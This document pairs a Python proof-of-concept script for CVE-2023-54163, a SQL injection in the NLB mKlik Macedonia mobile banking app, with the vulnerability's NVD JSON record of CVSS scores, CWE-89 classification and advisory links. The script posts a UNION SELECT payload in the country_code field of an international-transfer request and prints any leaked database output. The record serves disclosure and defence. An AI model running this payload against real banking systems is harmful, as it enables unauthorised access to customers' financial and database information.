CVE-2023-54163

import requests import json # CVE-2023-54163 PoC - NLB mKlik Macedonia SQL Injection # Target: International transfer parameters TARGET_URL = "https://example-nlb-bank.com/api/v1/international-transfer" def exploit_sql_injection(): """ SQL Injection PoC for CVE-2023-54163 This PoC demonstrates the injection vulnerability in international transfer parameters """ # Malicious payload for SQL injection in country_code parameter # This payload attempts to extract database version information malicious_payload = "' UNION SELECT NULL,@@version,NULL,NULL--" headers = { "Content-Type": "application/json", "Authorization": "Bearer <valid_token>", "User-Agent": "NLB-mKlik/3.3.12" } # Original legitimate request parameters data = { "sender_account": "1234567890", "receiver_name": "John Doe", "receiver_account": "GB82WEST12345698765432", "country_code": malicious_payload, # Injection point "currency": "EUR", "amount": "1000.00", "swift_code": "NLBKMK2X" } try: response = requests.post(TARGET_URL, headers=headers, json=data, timeout=30) # Check for SQL error indicators in response if response.status_code == 500: if "sql" in response.text.lower() or "mysql" in response.text.lower(): print("[+] SQL Injection vulnerability confirmed!") print(f"[+] Database error leaked: {response.text[:200]}") elif response.status_code == 200: print("[*] Request processed, check for data exfiltration in response") print(f"[*] Response: {response.json()}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": exploit_sql_injection()

{"cve": {"id": "CVE-2023-54163", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:48.337", "lastModified": "2026-01-16T19:16:14.840", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "NLB mKlik Macedonia 3.3.12 contains a SQL injection vulnerability in international transfer parameters that allows attackers to manipulate database queries. Attackers can inject arbitrary SQL code through unsanitized input to potentially disclose sensitive information from the mobile banking application."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nlb:mklik_makedonija:3.3.12:*:*:*:*:android:*:*", "matchCriteriaId": "B9A230B7-BB90-4D31-9010-D5C8B24414EB"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2023100040", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://packetstormsecurity.com/files/175113/NLB-mKlik-Makedonija-3.3.12-SQL-Injection.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://play.google.com/store/apps/details?id=hr.asseco.android.jimba.tutunskamk.production", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/nlb-mklik-macedonia-sql-injection-via-international-transfer-parameters", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5797.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://cxsecurity.com/issue/WLB-2023100040", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5797.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}